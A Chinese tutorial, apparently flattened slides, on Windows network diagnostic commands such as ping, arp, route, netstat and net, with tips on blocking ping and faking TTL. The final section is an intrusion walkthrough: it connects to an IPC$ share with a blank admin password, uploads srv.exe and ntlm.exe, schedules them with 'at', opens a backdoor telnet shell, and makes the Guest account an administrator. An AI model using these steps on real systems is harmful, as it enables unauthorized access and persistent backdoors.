网络常用命令及故障排查

网络常用命令及故障诊断,常用网络命令,cmd命令简介,运行此命令可快速进入Windows的命令行模式（适用于Windows2000以上的操作系统），点击“开始”-“运行”-“cmd”即可。,ping命令简介,原理:源站点向目的站点发送ICMPrequest报文,目的主机收到后回icmpreply报文.这样就验证了两个接点之间IP的可达性。功能:用ping来判断两个接点在网络层的连通性。,ping命令简介,ping命令参数：,Ping的使用,PING的一些参数：ping-t-a-ncount-llength-f-ittl-vtos-rcount-scount-jcomputer-list|-kcomputer-list-wtimeoutdestination-list-t:Ping指定的计算机直到中断。-a:将地址解析为计算机名。-ncount:发送count指定的ECHO数据包数。默认值为4。-llength:发送包含由length指定的数据量的ECHO数据包。默认为32字节；最大值是65,527。-f:在数据包中发送不要分段标志。数据包就不会被路由上的网关分段。-ittl:将“生存时间”字段设置为ttl指定的值。-vtos:将服务类型字段设置为tos指定的值。-rcount:在“记录路由”字段中记录传出和返回数据包的路由。count可以指定最少1台，最多9台计算机-scount:指定count指定的跃点数的时间戳。-jcomputer-list:利用computer-list指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP允许的最大数量为9。-kcomputer-list:利用computer-list指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP允许的最大数量为9。-wtimeout:指定超时间隔，单位为毫秒。destination-list:指定要ping的远程计算机,使用Ping命令检查连通性有五个步骤,1.使用ipconfig/all观察本地网络设置是否正确；2.Ping127.0.0.1，127.0.0.1是回送地址。Ping回送地址是为了检查本地的TCP/IP协议有没有设置好；3.Ping本机IP地址，这样是为了检查本机的IP地址是否设置有误；4.Ping本网网关或本网IP地址，这样的是为了检查硬件设备是否有问题，也可以检查本机与本地网络连接是否正常；(在非局域网中这一步骤可以忽略)5.Ping远程IP地址，这主要是检查本网或本机与外部的连接是否正常。,Ping的返回信息,1：RequestTimeOut“requesttimeout”这提示除了对方可能装有防火墙或已关机以外，还有就是本机的IP不正确和网关设置错误。2：DestinationHostUnreachable“DestinationNetUnreachable”这个信息表示对方主机不存在或者没有跟对方建立连接3：BadIPaddress这个信息表示你可能没有连接到DNS服务器所以无法解析这个IP地址，也可能是IP地址不存在。4：Sourcequenchreceived这个信息比较特殊，它出现的机率很少。它表示对方或中途的服务器繁忙无法回应。,防范被Ping,随着学校校园网越来越多人使用，用户对网络知识认知的提高，很多人在网上下载一些黑客工具或者用Ping命令，进行扫描端口、IP寻找肉机，带来很坏的影响。Ping命令它可以向你提供的地址发送一个小的数据包，然后侦听这台机器是否有“回答”。查找现在哪些机器在网络上活动。使用Ping入侵即是ICMP入侵，原理是通过Ping在一个时段内连续向计算机发出大量请求使得计算机的CPU占用率居高不下达到100%而系统死机甚至崩溃。我们可以通过在系统中设置安全策略来防止被ping.,常见防范被ping的2种手段,一：利用第三方软件，如天网防火墙、瑞星防火墙等防止被PING二：利用系统自带的IP安全策略，其设置分为2步。1是创建IP安全策略；2是指派IP安全策略。具体操作如下：,（一）创建IP安全策略1、依次单击“开始控制面板管理工具本地安全策略”，打开“本地安全设置”，右击该对话框左侧的“IP安全策略，在本地计算机”选项，执行“创建IP安全策略”命令。2、在出现的“默认响应规则身份验证方法”对话框中我们选中“此字符串用来保护密钥交换（预共享密钥）”选项，然后在下面的文字框中任意键入一段字符串。（如“禁止Ping”）3、完成了IP安全策略的创建工作后在“IP筛选器列表”窗口中单击“添加”按钮，此时将会弹出“IP筛选器向导”窗口，我们单击“下一步”，此时将会弹出“IP通信源”页面，在该页面中设置“源地址”为“我的IP地址”,“目标地址”为“任何IP地址”，任何IP地址的计算机都不能Ping你的机器。4、依次单击“下一步”“完成”，此时，你将会在“IP筛选器列表”看到刚刚创建的筛选器，将其选中后单击“下一步”，我们在出现的“筛选器操作”页面中设置筛选器操作为“需要安全”选项。（二）指派IP安全策略安全策略创建完毕后并不能马上生效，我们还需通过“指派”功能令其发挥作用。方法是：在“控制台根节点”中右击“新的IP安全策略”项，然后在弹出的右键菜单中执行“指派”命令，即可启用该策略。至此，这台主机已经具备了拒绝其他任何机器Ping自己IP地址的功能，不过在本地仍然能够Ping通自己。经过这样的设置之后，所有用户（包括管理员）都不能在其他机器上对此服务器进行Ping操作。从此你再也不用担心被Ping威胁。,另一种有效的方法,许多入侵者喜欢用TTL值来判断操作系统，他们首先会Ping一下你的机子，如看到TTL值为128就认为你的系统为WindowsNT/2000，如果TTL值为32则认为目标主机操作系统为Windows95/98，如果为TTL值为255/64就认为是UNIX/Linux操作系统。(一般情况下Windows系列的系统返回的TTL值在100-130之间，而UNIX/Linux系列的系统返回的TTL值在240-255之间)既然入侵者相信TTL值所反应出来的结果，那么我们不妨修改TTL值来欺骗入侵者，达到保护系统的目的。方法如下：在注册表里，展开”HKEY_LOCAL_MACHINESystemCurrentControlSetServicesTcpipParameters”找到”DefaultTTL,打开Windows自带的“记事本”程序，编写如下所示的批处理命令：echoREGEDIT4ChangeTTL.regREGEDIT/S/CChangeTTL.reg另存为以.bat为扩展名的批处理文件，点击这个文件，你的操作系统的缺省TTL值就会被修改为ff，即十进制的255，即把你的操作系统人为地改为UNIX系统了！DefaultTTL=dword:000000ff是用来设置系统缺省TTL值的，如果你想将自己的操作系统的TTL值改为其它操作系统的ICMP回显应答值，请改变DefaultTTL的键值，要注意它的键值为16进制。,arp命令简介,原理:arp即地址解析协议,用于实现第三层到第二层地址的转换，把IP转化为MAC地址。功能:显示和修改IP地址与MAC地址的之间映射。,arp命令简介,arp命令参数：,arp命令简介,arp命令参数：,arpa:显示所有的ARP表项。arp-s:在ARP缓存中添加一条记录.C:arp-s126.13.156.202-e0-fc-fe-01-b9arp-d:在ARP缓存中删除一条记录.C:arp-d126.13.156.2arp-g:显示所有的表项C:arp-g,ipconfig命令简介,ipconfig命令获得主机配置信息，包括IP地址、子网掩码和默认网关。1、ipconfig当使用ipconfig时不带任何参数选项，那么它为每个已经配置了的接口显示IP地址、子网掩码和缺省网关值。2、ipconfig/all当使用all选项时，ipconfig能为DNS和WINS服务器显示它已配置且所要使用的附加信息（如IP地址等），并且显示内置于本地网卡中的物理地址（MAC）。3、ipconfig/release和ipconfig/renew这是两个附加选项，只能在向DHCP服务器租用其IP地址的计算机上起作用。如果我们输入ipconfig/release，那么所有接口的租用IP地址便重新交付给DHCP服务器（归还IP地址）。如果我们输入ipconfig/renew，那么本地计算机便设法与DHCP服务器取得联系，并租用一个IP地址。请注意，大多数情况下网卡将被重新赋予和以前所赋予的相同的IP地址。,ipconfig命令简介,ipconfig命令示例：,tracert命令简介,简介:tracert是为了探测源节点到目的节点之间数据报文经过的路径。功能:探索两个节点的路由。原理：Tracert该诊断实用程序将包含不同生存时间(TTL)值的Internet控制消息协议(ICMP)回显数据包发送到目标，以决定到达目标采用的路由。要在转发数据包上的TTL之前至少递减1，必需路径上的每个路由器，所以TTL是有效的跃点计数。数据包上的TTL到达0时，路由器应该将“ICMP已超时”的消息发送回源系统。Tracert先发送TTL为1的回显数据包,并在随后的每次发送过程将TTL递增1，直到目标响应或TTL达到最大值，从而确定路由。路由通过检查中级路由器发送回的“ICMP已超时”的消息来确定路由。Tracert命令按顺序打印出返回“ICMP已超时”消息的路径中的近端路由器接口列表。如果使用-d选项，则Tracert实用程序不在每个IP地址上查询DNS。,tracert命令简介,tracert命令参数：,tracert命令简介,tracert命令参数：c:tracertip_adresstracert命令查看某个地址,得到的时间有3个如下比如:26ms10ms10ms.表示发送的三个探测包的回应时间；一般在网络情况平均的情况下，三个时间差不多；如果相差比较大，说明网络情况变化比较大.,route命令简介,原理:路由是IP层的核心问题，路由表是TCP/IP协议栈所必须的核心数据结构,是IP选路的唯一依据。功能:route命令是操作，维护路由表的重要工具。,route命令简介,route命令参数：,route命令简介,route命令参数：,routeprint查看路由表,route命令简介,route命令参数：,routeadd增加一条路由记录,route命令简介,route命令参数：,routedelete删除一条路由记录routepadd永久地增加一条路由记录(重起后不丢失),几个常用的例子,1：主机路由，从一台主机映射一条到本地网络上的的其他主机上我们想为本地主机接口hme0(204.12.17.1)和另一台在相邻才C类网络上的主机(204.12.16.100)之间增加一条路由#routeadd-host204.12.16.100204.12.17.1-interfacehme02：网络路由，允许数据包从本地主机传输到在本地网络的其他主机上如果我们要想为C类网掩码在本地主机(204.12.17.1)和我们上面指出的网络之间增加一条路由(204.12.16.0网络)我们可以使用如下的命令：#routeadd-net204.12.16.0204.12.17.1-netmask255.255.255.03：添加目标为10.41.0.0，子网掩码为255.255.0.0，下一个跃点地址为10.27.0.1的路由，执行以下命令：routeadd10.41.0.0mask255.255.0.010.27.0.1,要显示IP路由表中以192.开始的路由,添加默认网关地址为192.168.1.7的默认路由,netstat命令简介,功能：netstat命令是监视网络非常有用的工具，支持TCP/IP协议。它可以显示网络的路由表（routetable），实际的网络连接和每个网络接口设备的状态信息。,netstat命令简介,netstat命令参数：,NETSTAT-a-b-e-n-o-pproto-r-s-vinterval-a：显示所有连接和监听端口。-b：显示包含于创建每个连接或监听端口的可执行组件。-e：显示以太网统计信息，此选项可以与-s选项组合使用。-n：以数字形式显示地址和端口号。-o：显示与每个连接相关的所属进程ID。-p：显示proto指定的协议的连接。协议可以是下列协议之一:TCP、UDP、TCPv6或UDPv6。-r：显示路由表。(与routeprint一样)-s：显示按协议统计信息。默认显示IP、IPv6、ICMP、ICMPv6、TCP、TCPv6、UDP和UDPv6的统计信息。-v：与-b选项一起使用时将显示包含于为所有可执行组件创建连接或监听端口的组件。interval：重新显示选定统计信息，每次显示之间暂停时间间隔（以秒计）。按ctrl+c停止重新显示统计信息。如果省略，netstat显示当前配置信息（只显示一次）,netstat命令简介,netstat命令注释：,LocalAddress：本地地址ForeignAddress：外部地址PID：进程号State：状态，主要有以下几种：LISTENING：侦听来自远方的TCP端口的连接请求ESTABLISHED：代表一个打开的连接正在通信TIME_WAIT：等待足够的时间以确保远程TCP接收到连接中断请求的确认CLOSE-WAIT：等待从本地用户发来的连接中断请求CLOSING：等待远程TCP对连接中断的确认CLOSED：没有任何连接状态,netstat命令简介,netstat命令参数：,最常用的：netstat-ano列出所有联机状态*一种特殊的netstat连接情况，分析原因。,nbtstat命令简介,功能：nbtstat命令是解决NetBIOS名称解析问题的有用工具。可以使用nbtstat命令删除或更正预加载的项目NETBIOS名字分两种类型：唯一名(UNIQUE)和组名(GROUP)。唯一名很好理解，就是说在同一子网上要独一为二；而组名的作用是可以实现多播数据通讯。,nbtstat命令简介,net命令的基本语法如下：,nbtstat命令简介,nbtstat命令参数：,nbtstat-n显示由服务器或重定向器之类的程序在系统上本地注册的名称。,nbtstat命令简介,nbtstat命令参数：,nbtstataip_address使用远程计算机的IP地址并列出名称表nbtstataremotename对指定name的计算机执行NetBIOS适配器状态命令。适配器状态命令将返回计算机的本地NetBIOS名称表，以及适配器的媒体访问控制地址。,pathping命令简介,功能：pathping命令是一个路由跟踪工具，它将ping和tracert命令的功能和这两个工具所不提供的其他信息结合起来。pathping命令在一段时间内将数据包发送到到达最终目标的路径上的每个路由器，然后基于数据包的计算机结果从每个跃点返回。由于命令显示数据包在任何给定路由器或链接上丢失的程度，因此可以很容易地确定可能导致网络问题的路由器或链接。Pathping目标。这里的目标可以是一个主机名称也可以是一个IP地址。例如，或者209.217.46.121。接下来，你将得到一个分为两部分的报告。第一部分是通向目的地的线路上的每一个跳点的列表，第二部分是每一个跳点的统计，包括每一个跳点的数据包丢失的数量。它使用下面例子中显示的一些开关(switch)，最常用的：pathping-n-w1000210.28.112.143这个命令告诉pathping不解析路由器的IP地址，并且为每一个回显应答信息等待1秒钟(1000毫秒)。下面是一些最重要的pathping命令:n不显示每一台路由器的主机名。hvalue设置跟踪到目的地的最大跳点数量。默认是30个跳点。wvalue设置等待应答的最多时间(按毫秒计算)。p设置在发出新的ping命令之前等待的时间(按毫秒计算)。默认是250毫秒。qvalue设置ICMP回显请求信息发送的数量。默认是100。,pathping命令简介,pathping命令参数：,pathping命令简介,pathping命令参数：,c:pathpingip_adress,net命令简介,功能：net命令是一个命令行命令，Net命令有很多函数用于实用和核查计算机之间的NetBIOS连接，可以查看我们的管理网络环境、服务、用户、登陆等信息内容。net命令的基本语法如下：,netview命令简介,net命令参数：,c:netview作用：显示域列表、计算机列表或指定计算机的共享资源列表。命令格式：netviewcomputername|/domain:domainname有关参数说明：键入不带参数的netview显示当前域的计算机列表computername指定要查看其共享资源的计算机/domain:domainname指定要查看其可用计算机的域例如：netviewxhwl-server/查看xhwl-server计算机的共享资源列表。netview/domain:XYZ/查看XYZ域中的机器列表,netuser命令简介,net命令参数：,c:netuser作用：添加或更改用户帐号或显示用户帐号信息。命令格式：netuserusernamepassword|*options/domain有关参数说明：键入不带参数的netuser查看计算机上的用户帐号列表username添加、删除、更改或查看用户帐号名password为用户帐号分配或更改密码提示输入密码/domain在计算机主域的主域控制器中执行操作。例如：netusertest/查看用户test的信息。,netuse命令简介,net命令参数：,c:netuse作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。命令格式：Netusedevicename|*computernamesharenamevolumepassword|*/user:domainnameusername/delete|/persistent:yes|no例如：netusef:GHQTEMP/将GHQTEMP目录建立为F盘netusef:GHQTEMP/delete/断开连接,netuse命令简介,net命令参数：,c:netuse有关参数说明：键入不带参数的netuse列出网络连接devicename指定要连接到的资源名称或要断开的设备名称computernamesharename服务器及共享资源的名称password访问共享资源的密码*提示键入密码/user指定进行连接的另外一个用户domainname指定另一个域username指定登录的用户名/delete取消指定网络连接/persistent控制永久网络连接的使用。,netsend命令简介,net命令参数：,c:netsend作用：向网络的其他用户、计算机或通信名发送消息。命令格式：Netsendname|*|/domain:name|/usersmessage有关参数说明：name要接收发送消息的用户名、计算机名或通信名*将消息发送到组中所有名称/domain:name将消息发送到计算机域中的所有名称/users将消息发送到与服务器连接的所有用户message作为消息发送的文本例如：netsend/usersserverwillshutdownin10minutes/给所有连接到服务器的用户发送消息,net其它命令简介,net命令参数：,c:netstart作用：启动服务，或显示已启动服务的列表命令格式：netstartservicec:netpause作用：暂停正在运行的服务命令格式：netpauseservicec:netcontinue作用：重新激活挂起的服务命令格式：netcontinueservicec:netstop作用：停止WindowsNT/2000/2003网络服务命令格式：netstopservice,Net命令的典型用法ipc$连接,1.C:netuse127.0.0.1IPC$“”/user:“admintitrators”这是用流光扫到的用户名是administrators，密码为“空”的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为“空”，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。2.C:copysrv.exe127.0.0.1admin$先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:winntsystem32，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。3.C:nettime127.0.0.1查查时间，发现127.0.0.1的当前时间是2002/3/19上午11:00，命令成功完成。4.C:at127.0.0.111:05srv.exe用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）5.C:nettime127.0.0.1再查查到时间没有？如果127.0.0.1的当前时间是相同，那就准备开始下面的命令。6.C:telnet127.0.0.199这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了,7.C:copyntlm.exe127.0.0.1admin$用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在流光的Tools目录中）。8.C:WINNTsystem32ntlm输入ntlm启动（这里的C:WINNTsystem32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现DONE的时候，就说明已经启动正常。然后使用netstarttelnet来开启Telnet服务！9.Telnet127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！为了以防万一,我们再把guest激活加到管理组10.C:netuserguest/active:yes将对方的Guest用户激活11.C:netuserguest1234将Guest的密码改为1234,或者你要设定的密码12.C:netlocalgroupadministratorsguest/add将Guest变为Administrator_(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问